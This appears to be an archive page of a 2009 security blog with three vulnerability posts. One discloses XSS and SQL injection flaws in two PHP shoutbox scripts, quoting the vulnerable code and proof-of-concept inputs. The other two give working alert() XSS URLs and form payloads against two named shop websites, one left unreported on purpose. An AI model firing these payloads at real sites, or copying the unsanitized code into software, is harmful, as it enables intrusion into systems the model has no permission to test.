Archive for the ‘XSS’ Category

h1

Advanced Shoutbox and MySql Shoutbox scripts

July 11, 2009

Today I have found an XSS hole in the “Advanced Shoutbox” script and the same XSS hole and an SQL injection vulnerability in the “MySql shoutbox” wich are available here: http://plohni.com/wb/content/php/Free_scripts.php

Advanced Shoutbox

index.php Line 37:
<form action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post">

index.php Line 79-82:
if($display == "all"){
?><a href="<?php echo $_SERVER["PHP_SELF"]; ?>">View small shoutbox</a><?php
}else{
?><a href="<?php echo $_SERVER["PHP_SELF"]; ?>?show=all">View all shouts</a><?php
}

Very easy to exploit:
http://host/PATH_TO_SHOUTBOX/index.php/%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3Cspan

Affected Version: 1.0

MySql shoutbox

The XSS hole is the same as above, but on the lines 50, 55 and 97-99.

SQL Injection:
The index.php does not sanitize the users input on lines 105 and 106.

$input_name = $_POST["input_name"];
$input_text = $_POST["input_text"];
...
if($row["name"] != $input_name && $row["comment"] != $input_text){
mysql_query("INSERT INTO $db_table (name,comment) VALUES ('$input_name','$input_text');") or die(mysql_error()); //insert name and shout
}

Just send a POST request to the index.php. In the name field enter whatever you want and in the text field enter ‘+@@version+’ (including the ‘).

Affected Version: 1.0

Vendor has been informed on 27.06.2009

This post has been automatically published after two weeks since the vendor has been informed.

h1

XSSed: move-ya.com

June 21, 2009

I had a little break, and found a new shop with xss holes in it: move-ya.com

Free Image Hosting at www.ImageShack.us

http://www.move-ya.com/shop/html/detailsearch/DetailSearch_Re105.php?W0=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E&W1=&W2=&W3=

I’ve send an email to them…

h1

XSSed: softerpore.com

June 21, 2009

New blog, new xss…
Today i found an internet shop which is doing a lot of comment spamming in blogs etc… -> http://www.softerpore.com
It does not took long to find an xss hole in the registration page:
Just post
fname=%22%3E%3CSCrIPT%3Ealert%28%22Yes%2C+I%27m+vulnerable+to+XSS%22%29%3C%2FSCrIPT%3E&lname=&mail=&send=Create+Account
to http://www.softerpore.com/registration/

Or enter
"><SCrIPT>alert("Yes, I'm vulnerable to XSS")</SCrIPT>
to the inputbox you want it to be.

Free Image Hosting at www.ImageShack.us

And no… I will not give damn spammers a link to their website, you have to copy & paste… And in this case I will not send a notice to the administrator. He has enough to do with spamming etc, i don’t want to disturb him…